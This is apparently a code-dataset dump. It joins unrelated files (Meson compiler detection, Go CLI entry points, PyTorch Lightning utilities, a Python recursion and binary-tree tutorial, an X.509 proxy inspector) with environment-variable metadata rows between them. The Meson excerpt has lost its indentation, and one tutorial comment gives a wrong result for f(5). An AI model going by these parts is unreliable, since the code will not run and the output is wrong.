if 'windows' in out or env.machines[for_machine].is_windows():
# If we're in a MINGW context this actually will use a gnu style ld
try:
linker = guess_win_linker(env, compiler, comp, for_machine)
except MesonException:
pass
if not linker:
linker = guess_nix_linker(env, compiler, comp, for_machine)
return comp(
ccache + compiler, version, for_machine,
is_cross, info, exe_wrap, linker=linker, defines=defines)
_handle_exceptions(popen_exceptions, compilers)
raise EnvironmentException('Unreachable code (exception to make mypy happy)')
def detect_java_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
exelist = env.lookup_binary_entry(for_machine, 'java')
info = env.machines[for_machine]
if exelist is None:
# TODO support fallback
exelist = [defaults['java'][0]]
try:
p, out, err = Popen_safe(exelist + ['-version'])
except OSError:
raise EnvironmentException('Could not execute Java compiler "{}"'.format(' '.join(exelist)))
if 'javac' in out or 'javac' in err:
version = search_version(err if 'javac' in err else out)
if not version or version == 'unknown version':
parts = (err if 'javac' in err else out).split()
if len(parts) > 1:
version = parts[1]
comp_class = JavaCompiler
env.coredata.add_lang_args(comp_class.language, comp_class, for_machine, env)
return comp_class(exelist, version, for_machine, info)
raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"')
def detect_cs_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
compilers, ccache, exe_wrap = _get_compilers(env, 'cs', for_machine)
popen_exceptions = {}
info = env.machines[for_machine]
for comp in compilers:
try:
p, out, err = Popen_safe(comp + ['--version'])
except OSError as e:
popen_exceptions[' '.join(comp + ['--version'])] = e
continue
version = search_version(out)
cls: T.Union[T.Type[MonoCompiler], T.Type[VisualStudioCsCompiler]]
if 'Mono' in out:
cls = MonoCompiler
elif "Visual C#" in out:
cls = VisualStudioCsCompiler
else:
continue
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
return cls(comp, version, for_machine, info)
_handle_exceptions(popen_exceptions, compilers)
raise EnvironmentException('Unreachable code (exception to make mypy happy)')
def detect_cython_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
"""Search for a cython compiler."""
compilers, _, _ = _get_compilers(env, 'cython', for_machine)
is_cross = env.is_cross_build(for_machine)
info = env.machines[for_machine]
popen_exceptions: T.Dict[str, Exception] = {}
for comp in compilers:
try:
err = Popen_safe(comp + ['-V'])[2]
except OSError as e:
popen_exceptions[' '.join(comp + ['-V'])] = e
continue
version = search_version(err)
if 'Cython' in err:
comp_class = CythonCompiler
env.coredata.add_lang_args(comp_class.language, comp_class, for_machine, env)
return comp_class(comp, version, for_machine, info, is_cross=is_cross)
_handle_exceptions(popen_exceptions, compilers)
raise EnvironmentException('Unreachable code (exception to make mypy happy)')
def detect_vala_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
exelist = env.lookup_binary_entry(for_machine, 'vala')
is_cross = env.is_cross_build(for_machine)
info = env.machines[for_machine]
if exelist is None:
# TODO support fallback
exelist = [defaults['vala'][0]]
try:
p, out = Popen_safe(exelist + ['--version'])[0:2]
except OSError:
raise EnvironmentException('Could not execute Vala compiler "{}"'.format(' '.join(exelist)))
version = search_version(out)
if 'Vala' in out:
comp_class = ValaCompiler
env.coredata.add_lang_args(comp_class.language, comp_class, for_machine, env)
return comp_class(exelist, version, for_machine, is_cross, info)
raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"')
def detect_rust_compiler(env: 'Environment', for_machine: MachineChoice) -> RustCompiler:
popen_exceptions = {} # type: T.Dict[str, Exception]
compilers, _, exe_wrap = _get_compilers(env, 'rust', for_machine)
is_cross = env.is_cross_build(for_machine)
info = env.machines[for_machine]
cc = detect_c_compiler(env, for_machine)
is_link_exe = isinstance(cc.linker, VisualStudioLikeLinkerMixin)
override = env.lookup_binary_entry(for_machine, 'rust_ld')
for compiler in compilers:
arg = ['--version']
try:
out = Popen_safe(compiler + arg)[1]
except OSError as e:
popen_exceptions[' '.join(compiler + arg)] = e
continue
version = search_version(out)
cls: T.Type[RustCompiler] = RustCompiler
        # Clippy is a wrapper around rustc, but it doesn't have rustc in its
# output. We can otherwise treat it as rustc.
if 'clippy' in out:
out = 'rustc'
cls = ClippyRustCompiler
if 'rustc' in out:
            # On Linux and mac, rustc will invoke gcc (clang for mac,
            # presumably) for dynamic linking, and it can do this on
            # windows too. This means the easiest way to figure out what
            # linker to use is to just get the value of the C compiler
            # and use that as the basis of the rust linker.
            # However, there are two things we need to change: if CC is
            # not the default, use that; and second, add the necessary
            # arguments to tell rust to use -fuse-ld.
if any(a.startswith('linker=') for a in compiler):
mlog.warning(
'Please do not put -C linker= in your compiler '
'command, set rust_ld=command in your cross file '
'or use the RUST_LD environment variable, otherwise meson '
'will override your selection.')
compiler = compiler.copy() # avoid mutating the original list
if override is None:
extra_args: T.Dict[str, T.Union[str, bool]] = {}
always_args: T.List[str] = []
if is_link_exe:
compiler.extend(cls.use_linker_args(cc.linker.exelist[0]))
extra_args['direct'] = True
extra_args['machine'] = cc.linker.machine
else:
exelist = cc.linker.exelist + cc.linker.get_always_args()
if 'ccache' in exelist[0]:
del exelist[0]
c = exelist.pop(0)
compiler.extend(cls.use_linker_args(c))
# Also ensure that we pass any extra arguments to the linker
for l in exelist:
compiler.extend(['-C', f'link-arg={l}'])
# This trickery with type() gets us the class of the linker
# so we can initialize a new copy for the Rust Compiler
# TODO rewrite this without type: ignore
if is_link_exe:
linker = type(cc.linker)(for_machine, always_args, exelist=cc.linker.exelist, # type: ignore
version=cc.linker.version, **extra_args) # type: ignore
else:
linker = type(cc.linker)(compiler, for_machine, cc.LINKER_PREFIX,
always_args=always_args, version=cc.linker.version,
**extra_args) # type: ignore
elif 'link' in override[0]:
linker = guess_win_linker(env,
override, cls, for_machine, use_linker_prefix=False)
# rustc takes linker arguments without a prefix, and
# inserts the correct prefix itself.
assert isinstance(linker, VisualStudioLikeLinkerMixin)
linker.direct = True
compiler.extend(cls.use_linker_args(linker.exelist[0]))
else:
# On linux and macos rust will invoke the c compiler for
# linking, on windows it will use lld-link or link.exe.
# we will simply ask for the C compiler that corresponds to
# it, and use that.
cc = _detect_c_or_cpp_compiler(env, 'c', for_machine, override_compiler=override)
linker = cc.linker
# Of course, we're not going to use any of that, we just
# need it to get the proper arguments to pass to rustc
c = linker.exelist[1] if linker.exelist[0].endswith('ccache') else linker.exelist[0]
compiler.extend(cls.use_linker_args(c))
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
return cls(
compiler, version, for_machine, is_cross, info, exe_wrap,
linker=linker)
_handle_exceptions(popen_exceptions, compilers)
raise EnvironmentException('Unreachable code (exception to make mypy happy)')
def detect_d_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
info = env.machines[for_machine]
# Detect the target architecture, required for proper architecture handling on Windows.
# MSVC compiler is required for correct platform detection.
c_compiler = {'c': detect_c_compiler(env, for_machine)}
is_msvc = isinstance(c_compiler['c'], VisualStudioCCompiler)
if not is_msvc:
c_compiler = {}
# Import here to avoid circular imports
from ..environment import detect_cpu_family
arch = detect_cpu_family(c_compiler)
if is_msvc and arch == 'x86':
arch = 'x86_mscoff'
popen_exceptions = {}
is_cross = env.is_cross_build(for_machine)
compilers, ccache, exe_wrap = _get_compilers(env, 'd', for_machine)
for exelist in compilers:
# Search for a D compiler.
# We prefer LDC over GDC unless overridden with the DC
# environment variable because LDC has a much more
        # up-to-date language version at the time of writing (2016).
if os.path.basename(exelist[-1]).startswith(('ldmd', 'gdmd')):
raise EnvironmentException(
                f'Meson does not support {exelist[-1]} as it is only a DMD frontend for another compiler. '
                'Please provide a valid value for DC or unset it so that Meson can resolve the compiler by itself.')
try:
p, out = Popen_safe(exelist + ['--version'])[0:2]
except OSError as e:
popen_exceptions[' '.join(exelist + ['--version'])] = e
continue
version = search_version(out)
full_version = out.split('\n', 1)[0]
if 'LLVM D compiler' in out:
# LDC seems to require a file
            # We cannot use NamedTemporaryFile on windows; it's documented
# to not work for our uses. So, just use mkstemp and only have
# one path for simplicity.
o, f = tempfile.mkstemp('.d')
os.close(o)
try:
if info.is_windows() or info.is_cygwin():
objfile = os.path.basename(f)[:-1] + 'obj'
linker = guess_win_linker(env,
exelist,
LLVMDCompiler, for_machine,
use_linker_prefix=True, invoked_directly=False,
extra_args=[f])
else:
# LDC writes an object file to the current working directory.
# Clean it up.
objfile = os.path.basename(f)[:-1] + 'o'
linker = guess_nix_linker(env,
exelist, LLVMDCompiler, for_machine,
extra_args=[f])
finally:
windows_proof_rm(f)
windows_proof_rm(objfile)
return LLVMDCompiler(
exelist, version, for_machine, info, arch,
full_version=full_version, linker=linker, version_output=out)
elif 'gdc' in out:
linker = guess_nix_linker(env, exelist, GnuDCompiler, for_machine)
return GnuDCompiler(
exelist, version, for_machine, info, arch,
exe_wrapper=exe_wrap, is_cross=is_cross,
full_version=full_version, linker=linker)
elif 'The D Language Foundation' in out or 'Digital Mars' in out:
# DMD seems to require a file
            # We cannot use NamedTemporaryFile on windows; it's documented
# to not work for our uses. So, just use mkstemp and only have
# one path for simplicity.
o, f = tempfile.mkstemp('.d')
os.close(o)
            # DMD has different detection logic for x86 and x86_64
arch_arg = '-m64' if arch == 'x86_64' else '-m32'
try:
if info.is_windows() or info.is_cygwin():
objfile = os.path.basename(f)[:-1] + 'obj'
linker = guess_win_linker(env,
exelist, DmdDCompiler, for_machine,
invoked_directly=False, extra_args=[f, arch_arg])
else:
objfile = os.path.basename(f)[:-1] + 'o'
linker = guess_nix_linker(env,
exelist, DmdDCompiler, for_machine,
extra_args=[f, arch_arg])
finally:
windows_proof_rm(f)
windows_proof_rm(objfile)
return DmdDCompiler(
exelist, version, for_machine, info, arch,
full_version=full_version, linker=linker)
raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"')
_handle_exceptions(popen_exceptions, compilers)
raise EnvironmentException('Unreachable code (exception to make mypy happy)')
def detect_swift_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
exelist = env.lookup_binary_entry(for_machine, 'swift')
is_cross = env.is_cross_build(for_machine)
info = env.machines[for_machine]
if exelist is None:
# TODO support fallback
exelist = [defaults['swift'][0]]
try:
p, _, err = Popen_safe(exelist + ['-v'])
except OSError:
raise EnvironmentException('Could not execute Swift compiler "{}"'.format(' '.join(exelist)))
version = search_version(err)
if 'Swift' in err:
        # As of 5.0.1, swiftc *requires* a file to check the linker:
with tempfile.NamedTemporaryFile(suffix='.swift') as f:
linker = guess_nix_linker(env,
exelist, SwiftCompiler, for_machine,
extra_args=[f.name])
return SwiftCompiler(
exelist, version, for_machine, is_cross, info, linker=linker)
raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"')
# GNU/Clang defines and version
# =============================
def _get_gnu_compiler_defines(compiler: T.List[str]) -> T.Dict[str, str]:
"""
Detect GNU compiler platform type (Apple, MinGW, Unix)
"""
# Arguments to output compiler pre-processor defines to stdout
# gcc, g++, and gfortran all support these arguments
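    # Illustrative output (an assumption; the exact defines vary by version and target):
    #   echo | gcc -E -dM -
    # prints lines such as "#define __GNUC__ 9" and "#define __STDC__ 1".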
args = compiler + ['-E', '-dM', '-']
p, output, error = Popen_safe(args, write='', stdin=subprocess.PIPE)
if p.returncode != 0:
raise EnvironmentException('Unable to detect GNU compiler type:\n' + output + error)
# Parse several lines of the type:
# `#define ___SOME_DEF some_value`
# and extract `___SOME_DEF`
defines: T.Dict[str, str] = {}
for line in output.split('\n'):
if not line:
continue
d, *rest = line.split(' ', 2)
if d != '#define':
continue
if len(rest) == 1:
defines[rest[0]] = ''
if len(rest) == 2:
defines[rest[0]] = rest[1]
return defines
def _get_clang_compiler_defines(compiler: T.List[str]) -> T.Dict[str, str]:
"""
Get the list of Clang pre-processor defines
"""
args = compiler + ['-E', '-dM', '-']
p, output, error = Popen_safe(args, write='', stdin=subprocess.PIPE)
if p.returncode != 0:
raise EnvironmentException('Unable to get clang pre-processor defines:\n' + output + error)
defines: T.Dict[str, str] = {}
for line in output.split('\n'):
if not line:
continue
d, *rest = line.split(' ', 2)
if d != '#define':
continue
if len(rest) == 1:
defines[rest[0]] = ''
if len(rest) == 2:
defines[rest[0]] = rest[1]
return defines
def _get_gnu_version_from_defines(defines: T.Dict[str, str]) -> str:
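    # e.g. (illustrative) {'__GNUC__': '9', '__GNUC_MINOR__': '3', '__GNUC_PATCHLEVEL__': '0'} -> '9.3.0'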
dot = '.'
major = defines.get('__GNUC__', '0')
minor = defines.get('__GNUC_MINOR__', '0')
patch = defines.get('__GNUC_PATCHLEVEL__', '0')
return dot.join((major, minor, patch))
def _get_lcc_version_from_defines(defines: T.Dict[str, str]) -> str:
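    # e.g. (illustrative values) {'__LCC__': '125', '__LCC_MINOR__': '16'} -> '1.25.16'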
dot = '.'
generation_and_major = defines.get('__LCC__', '100')
generation = generation_and_major[:1]
major = generation_and_major[1:]
minor = defines.get('__LCC_MINOR__', '0')
return dot.join((generation, major, minor))
| [] | [] | [
"WATCOM"
] | [] | ["WATCOM"] | python | 1 | 0 | |
chessbot/config.py | import os
import datetime
TOKEN = os.environ.get("TOKEN")
DB_PATH = os.environ.get("DB_PATH")
EXPIRATION_TIMEDELTA = datetime.timedelta(days=7)
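# Illustrative usage (an assumption, not part of the original module): a record
# created now would expire at datetime.datetime.utcnow() + EXPIRATION_TIMEDELTA.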
| [] | [] | [
"DB_PATH",
"TOKEN"
] | [] | ["DB_PATH", "TOKEN"] | python | 2 | 0 | |
cmd/main.go | package main
import (
"flag"
"fmt"
"github.com/sirupsen/logrus"
"github.com/yosuke-furukawa/json5/encoding/json5"
"io/ioutil"
"os"
"strings"
)
// Injected when compiling
var (
appVersion = "Unknown"
appCommit = "Unknown"
appDate = "Unknown"
)
var (
configPath = flag.String("config", "config.json", "Config file")
showVersion = flag.Bool("version", false, "Show version")
)
func init() {
logrus.SetOutput(os.Stdout)
lvl, err := logrus.ParseLevel(os.Getenv("LOGGING_LEVEL"))
if err == nil {
logrus.SetLevel(lvl)
} else {
logrus.SetLevel(logrus.DebugLevel)
}
	// tsFormat is used to format the log timestamp; by default (empty)
	// the RFC3339 ("2006-01-02T15:04:05Z07:00") format is used.
	// The user can set an environment variable to override the default
	// timestamp format (e.g. "2006-01-02 15:04:05").
tsFormat := os.Getenv("LOGGING_TIMESTAMP_FORMAT")
fmtter := os.Getenv("LOGGING_FORMATTER")
if strings.ToLower(fmtter) == "json" {
logrus.SetFormatter(&logrus.JSONFormatter{
TimestampFormat: tsFormat,
})
} else {
logrus.SetFormatter(&logrus.TextFormatter{
ForceColors: true,
FullTimestamp: true,
TimestampFormat: tsFormat,
})
}
flag.Parse()
}
func main() {
if *showVersion {
// Print version and quit
fmt.Printf("%-10s%s\n", "Version:", appVersion)
fmt.Printf("%-10s%s\n", "Commit:", appCommit)
fmt.Printf("%-10s%s\n", "Date:", appDate)
return
}
cb, err := ioutil.ReadFile(*configPath)
if err != nil {
logrus.WithFields(logrus.Fields{
"file": *configPath,
"error": err,
}).Fatal("Failed to read configuration")
}
mode := flag.Arg(0)
if strings.EqualFold(mode, "server") {
// server mode
c, err := parseServerConfig(cb)
if err != nil {
logrus.WithFields(logrus.Fields{
"file": *configPath,
"error": err,
}).Fatal("Failed to parse server configuration")
}
server(c)
} else if len(mode) == 0 || strings.EqualFold(mode, "client") {
// client mode
c, err := parseClientConfig(cb)
if err != nil {
logrus.WithFields(logrus.Fields{
"file": *configPath,
"error": err,
}).Fatal("Failed to parse client configuration")
}
client(c)
} else {
// invalid
fmt.Println()
fmt.Printf("Usage: %s MODE [OPTIONS]\n\n"+
"Available modes: server, client\n\n", os.Args[0])
}
}
func parseServerConfig(cb []byte) (*serverConfig, error) {
var c serverConfig
err := json5.Unmarshal(cb, &c)
if err != nil {
return nil, err
}
return &c, c.Check()
}
func parseClientConfig(cb []byte) (*clientConfig, error) {
var c clientConfig
err := json5.Unmarshal(cb, &c)
if err != nil {
return nil, err
}
return &c, c.Check()
}
| [
"\"LOGGING_LEVEL\"",
"\"LOGGING_TIMESTAMP_FORMAT\"",
"\"LOGGING_FORMATTER\""
] | [] | [
"LOGGING_LEVEL",
"LOGGING_FORMATTER",
"LOGGING_TIMESTAMP_FORMAT"
] | [] | ["LOGGING_LEVEL", "LOGGING_FORMATTER", "LOGGING_TIMESTAMP_FORMAT"] | go | 3 | 0 | |
pytorch_lightning/utilities/distributed.py | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import warnings
from functools import wraps
from pytorch_lightning import _logger as log
def rank_zero_only(fn):
@wraps(fn)
def wrapped_fn(*args, **kwargs):
if rank_zero_only.rank == 0:
return fn(*args, **kwargs)
return wrapped_fn
# add the attribute to the function but don't overwrite in case Trainer has already set it
rank_zero_only.rank = getattr(rank_zero_only, 'rank', int(os.environ.get('LOCAL_RANK', 0)))
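# Illustrative usage (not part of this module): decorate a function so it only
# runs on the global-rank-0 process, e.g.
#   @rank_zero_only
#   def log_hyperparams():
#       ...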
def _warn(*args, **kwargs):
warnings.warn(*args, **kwargs)
def _info(*args, **kwargs):
log.info(*args, **kwargs)
def _debug(*args, **kwargs):
log.debug(*args, **kwargs)
rank_zero_debug = rank_zero_only(_debug)
rank_zero_info = rank_zero_only(_info)
rank_zero_warn = rank_zero_only(_warn)
def find_free_network_port() -> int:
"""
Finds a free port on localhost.
It is useful in single-node training when we don't want to connect to a real master node but
have to set the `MASTER_PORT` environment variable.
"""
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
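# Illustrative usage (an assumption): reserve a port before spawning processes, e.g.
#   os.environ['MASTER_PORT'] = str(find_free_network_port())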
| [] | [] | [
"LOCAL_RANK"
] | [] | ["LOCAL_RANK"] | python | 1 | 0 | |
cmd/root.go | package cmd
import (
"os"
log "github.com/sirupsen/logrus"
"github.com/spf13/cobra"
"github.com/spf13/cobra/doc"
)
const (
version = "1.4.1"
)
var port int
var tls bool
var verbose bool
var rootCmd = &cobra.Command{
Use: "ktunnel",
Short: "Ktunnel is a network tunneling tool for kubernetes",
Long: `Built to ease development on kubernetes clusters and allow connectivity between dev machines and clusters`,
Version: version,
Args: cobra.MinimumNArgs(1),
}
var logger = log.Logger{
Out: os.Stdout,
Formatter: &log.TextFormatter{
ForceColors: true,
FullTimestamp: true,
TimestampFormat: "2006-01-02 15:04:05.000",
},
Level: log.InfoLevel,
}
func Execute() {
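	// Setting the GEN_DOC environment variable to "true" regenerates the
	// markdown command docs under ./docs before the command is executed.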
if genDoc := os.Getenv("GEN_DOC"); genDoc == "true" {
err := doc.GenMarkdownTree(rootCmd, "./docs")
if err != nil {
log.Errorf("Failed generating docs: %v", err)
}
}
if err := rootCmd.Execute(); err != nil {
logger.WithError(err).Errorf("error executing command")
os.Exit(1)
}
}
func init() {
rootCmd.PersistentFlags().IntVarP(&port, "port", "p", 28688, "The port to use to establish the tunnel")
rootCmd.PersistentFlags().BoolVarP(&tls, "tls", "t", false, "Connection uses tls if true, else plain TCP")
rootCmd.PersistentFlags().BoolVarP(&verbose, "verbose", "v", false, "verbose mode")
_ = rootCmd.MarkFlagRequired("port")
}
| [
"\"GEN_DOC\""
] | [] | [
"GEN_DOC"
] | [] | ["GEN_DOC"] | go | 1 | 0 | |
9z10_tree_recursion.py | # 1/22/2020
# Recursion
# Recursive definition: the problem or the data structure must itself be defined recursively
# Base case (exit): the condition under which the recursion terminates
# Recursive step (decomposition): how to break the problem down while the recursion has not terminated
# Approach:
# 1. Write down the base/boundary condition
# 2. Find the relation between this step and the previous step
# 3. Assume the current function already works, call it to compute the previous result, then derive this step's result from it
# fibonacci
# Recursive definition: the Fibonacci sequence satisfies F(n) = F(n-1) + F(n-2)
# Base case (exit): when n = 0 or n = 1, the problem is small enough
# Recursive step (decomposition): return fibonacci(n-1) + fibonacci(n-2)
list1 = []
def f(n):
list1.append(n)
if n == 1 or n == 2:
return 1
return f(n-1) + f(n-2)
print("res = %d" % f(5)) # res = 3
for i in list1:
print("f(%d)" % i, end=" ") # output: f(5) f(4) f(3) f(2) f(1) f(2) f(3) f(2) f(1)
list2 = []
def f(n):
list2.append(n)
if n == 1 or n == 2:
return 1
return f(n-2) + f(n-1)
print("")
print("res = %d" % f(5)) # res = 3
for i in list2:
print("f(%d)" % i, end=" ") # output: f(5) f(3) f(1) f(2) f(4) f(2) f(3) f(1) f(2)
print("")
print("======================================")
# fibonacci loop
def fib(N):
a = 0
b = 1
if N <= 0:
return a
if N == 2 or N == 1:
return b
while N > 0:
a, b = b, a + b
N -= 1
return a
print(fib(3))
print("======================================")
def fib_loop(n):
a, b = 0, 1 # f(0) = 0 , f(1) = 1
for i in range(n):
a, b = b, a + b # f(n-1) + f(n-2)
return a
print(fib_loop(6))
print("======================================")
# Tree
# Concept: a tree is an abstract data type used to model a collection of data with a hierarchical, tree-like structure; it consists of n (n >= 0) finite nodes organized into a set with layered parent/child relationships.
# A tree is like a company:
# * it is made up of nodes
# * each node has zero or more child nodes ; like a manager who manages many people
# * the node without a parent is the root node ; the company's big boss
# * every non-root node has exactly one parent node ; apart from the big boss, everyone has a manager
# * nodes without any children are called leaf nodes ; the bottom-level employees
# * a tree has exactly one root node ; only one big boss is allowed
# Binary tree
# * each node has at most two child nodes
# * the two children are called the left child and the right child
# * leaf node: a node with no children
# * unless stated otherwise, the trees discussed here are binary trees
# Properties of binary trees:
# Level i of a binary tree holds at most 2^(i-1) nodes; e.g. on level 3, i = 3, at most 2^(3-1) = 4 nodes
# A binary tree of depth k holds at most 2^k - 1 nodes; e.g. for depth 4, k = 4, 2^4 - 1 = 15 nodes
# In a complete binary tree numbered top-to-bottom and left-to-right, node i has its left child at 2i, its right child at 2i + 1, and its parent at i/2.
# Complete binary tree: every level except the bottom one holds the maximum number of nodes (2 children each);
# that is, if the tree has depth h, levels 1..h-1 are completely filled,
# and all nodes on level h are packed contiguously to the left.
# Full binary tree: every level holds the maximum number of nodes
# Binary search tree: for any node, the value of its left child is always smaller than its own, and the value of its right child is always larger
#                8
#              /   \
#             3     10
#            / \      \
#           1   6      14
#              / \     /
#             4   7   13
# Binary search
# Common applications of trees: HTML (when writing parsers for such documents); routing protocols use tree algorithms; MySQL database indexes; file system directory structures
# Tree node:
class TreeNode(object):
def __init__(self, item):
self.item = item
self.left = None
self.right = None
# Binary tree implementation:
class BinaryTree(object):
    def __init__(self):
        self.root = None
    def add(self, item):  # add a new node
        # Use breadth-first (level-order) traversal: walk the tree level by level and add the node at the first free slot
        node = TreeNode(item)  # create a new node
        if self.root == None:  # if the root is empty
            self.root = node  # point the root at the new node
            return
        queue = [self.root]  # create a queue list holding the root; traverse the whole tree queue-style
        while queue:  # loop until the queue list is empty; an empty list is falsy, a non-empty one is truthy
            current_node = queue.pop(0)  # remove the first node from the queue and call it the current node
            if current_node.left == None:  # if the current node's left child is empty
                current_node.left = node  # point the left child at the newly added node
                return
            else:
                queue.append(current_node.left)  # the left child is not empty, so push it onto the queue
            if current_node.right == None:  # if the current node's right child is empty
                current_node.right = node  # point the right child at the newly added node
                return
            else:
                queue.append(current_node.right)
    def breadth_travel(self):
        # breadth-first (level-order) traversal
        if self.root == None:  # if the root is empty
            return  # bail out
        queue = [self.root]  # build a queue list containing the root
        while queue:  # loop until the queue list is empty; an empty list is falsy, a non-empty one is truthy
            current_node = queue.pop(0)  # remove the first node from the queue and call it the current node
            print(current_node.item, end=" ")  # print the current node's value
            if current_node.left != None:  # if the current node's left child is not empty
                queue.append(current_node.left)  # append the left child to the tail of the queue
            if current_node.right != None:  # if the current node's right child is not empty
                queue.append(current_node.right)  # append the right child to the tail of the queue
    def preOrder(self, node):  # pre-order traversal: root, left, right
        if node == None:
            return
        print(node.item, end=" ")
        self.preOrder(node.left)
        self.preOrder(node.right)
    def inOrder(self, node):  # in-order traversal: left, root, right
        if node == None:
            return
        self.inOrder(node.left)
        print(node.item, end=" ")
        self.inOrder(node.right)
    def postOrder(self, node):  # post-order traversal: left, right, root
        if node == None:
            return
        self.postOrder(node.left)
        self.postOrder(node.right)
        print(node.item, end=" ")
    def leafSum(self, node):  # sum of the leaf node values, O(n); tree operations here are O(n) because every node is visited exactly once
        if node == None:  # if the node is empty
            return 0  # contribute 0
        if node.left == None and node.right == None:  # left and right both empty, so this is a leaf node
            return node.item  # return the leaf's value
        return self.leafSum(node.left) + self.leafSum(node.right)  # sum the leaves of both subtrees
    def maxDepth(self, node):  # maximum depth of the tree, O(n); depth is measured per node, height per subtree/tree
        if node == None:
            return 0
        if node.left == None and node.right == None:  # left and right both empty, so this is a leaf node
            return 1  # a leaf contributes depth 1
        return max(self.maxDepth(node.left), self.maxDepth(node.right)) + 1  # each level of recursion adds 1 to the depth
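# Illustrative sketch (not part of the original lesson): the binary search
# tree described above keeps smaller values in the left subtree and larger
# values in the right subtree, so a lookup is a binary search. The names
# below are hypothetical, and duplicates are sent to the right subtree.
class BSTNode(object):
    def __init__(self, item):
        self.item = item
        self.left = None
        self.right = None
def bst_insert(node, item):
    if node is None:
        return BSTNode(item)
    if item < node.item:
        node.left = bst_insert(node.left, item)
    else:
        node.right = bst_insert(node.right, item)
    return node
def bst_search(node, item):
    if node is None:
        return False
    if item == node.item:
        return True
    if item < node.item:
        return bst_search(node.left, item)
    return bst_search(node.right, item)
# Example: build the tree drawn above and look up a value
# root = None
# for v in [8, 3, 10, 1, 6, 14, 4, 7, 13]:
#     root = bst_insert(root, v)
# bst_search(root, 7)  # -> True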
if __name__ == "__main__":
tree = BinaryTree()
tree.add(0)
tree.add(1)
tree.add(2)
tree.add(3)
tree.add(4)
tree.add(5)
tree.add(6)
tree.add(7)
tree.add(8)
tree.add(9)
    tree.breadth_travel() # breadth-first level-order traversal, output: 0 1 2 3 4 5 6 7 8 9
    print("")
    tree.preOrder(tree.root) # root left right, output: 0 1 3 7 8 4 9 2 5 6
    print("")
    tree.inOrder(tree.root) # left root right, output: 7 3 8 1 9 4 0 5 2 6
    print("")
    tree.postOrder(tree.root) # left right root, output: 7 8 3 9 4 1 5 6 2 0
    print("")
    print(tree.leafSum(tree.root)) # output: 35
    print("")
    print(tree.maxDepth(tree.root)) # output: 4
def reverse(x):
"""
:type x: int
:rtype: int
"""
str1 = str(x)
sign = 1
start = 0
j = 1
print(str1)
if str1[0] == "-":
start = 1
sign = -1
num = ""
for i in range(start, len(str1)):
num += str1[- j]
print("num", num)
j += 1
return sign * int(num)
n = 1234567
print(reverse(n))
| [] | [] | [] | [] | [] | python | null | null | null |
examples/proxy-info/main.go | /*
* Copyright (c) CERN 2016
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package main
import (
"crypto/rsa"
"crypto/x509/pkix"
"flag"
"fmt"
"github.com/ayllon/go-proxy"
"log"
"os"
)
var proxyPath = flag.String("file", "", "Proxy location")
var typeRepr = []string{"Not a proxy", "Legacy proxy", "Draft proxy", "RFC 3820 Proxy"}
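// getProxyPath returns the value of $X509_USER_PROXY when set, otherwise the
// conventional per-user default location /tmp/x509up_u<uid>.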
func getProxyPath() string {
if path := os.Getenv("X509_USER_PROXY"); path != "" {
return path
}
return fmt.Sprintf("/tmp/x509up_u%d", os.Getuid())
}
func main() {
capath := flag.String("capath", "/etc/grid-security/certificates", "Directory with the root CAs")
vomsdir := flag.String("vomsdir", "/etc/grid-security/vomsdir/", "VOMS dir")
debug := flag.Bool("debug", false, "Dump extra information")
crls := flag.Bool("crls", false, "Load CRLs")
flag.Parse()
if *proxyPath == "" {
*proxyPath = getProxyPath()
}
var p proxy.X509Proxy
if e := p.DecodeFromFile(*proxyPath); e != nil {
log.Fatal(e)
}
roots, err := proxy.LoadCAPath(*capath, *crls)
if err != nil {
fmt.Printf("Failed to load the root CA: %s", err)
} else if *debug {
fmt.Println("Loaded root CA")
for hash, ca := range roots.CaByHash {
fmt.Println(hash, " ", proxy.NameRepr(&ca.Subject))
}
fmt.Println("\nLoaded CRLs")
for hash, crl := range roots.Crls {
name := pkix.Name{}
name.FillFromRDNSequence(&crl.TBSCertList.Issuer)
fmt.Println(hash, " ", proxy.NameRepr(&name))
}
fmt.Println("")
}
fmt.Printf("subject : %s\n", proxy.NameRepr(&p.Subject))
fmt.Printf("issuer : %s\n", proxy.NameRepr(&p.Issuer))
fmt.Printf("identity : %s\n", proxy.NameRepr(&p.Identity))
fmt.Printf("type : %s\n", typeRepr[p.ProxyType])
fmt.Printf("strength : %d bits\n", p.Certificate.PublicKey.(*rsa.PublicKey).N.BitLen())
fmt.Printf("timeleft : %s\n", p.Lifetime())
fmt.Printf("key usage : %s\n", proxy.KeyUsageRepr(p.Certificate.KeyUsage))
if len(p.VomsAttributes) > 0 {
fmt.Print("=== VO dteam extension information ===\n")
}
for _, v := range p.VomsAttributes {
fmt.Printf("VO : %s\n", v.Vo)
fmt.Printf("subject : %s\n", proxy.NameRepr(&v.Subject))
fmt.Printf("issuer : %s\n", proxy.NameRepr(&v.Issuer))
fmt.Printf("attribute : %s\n", v.Fqan)
fmt.Printf("timeleft : %s\n", v.Lifetime())
fmt.Printf("uri : %s\n", v.PolicyAuthority)
}
if roots != nil {
if err = p.Verify(proxy.VerifyOptions{
Roots: roots,
VomsDir: *vomsdir,
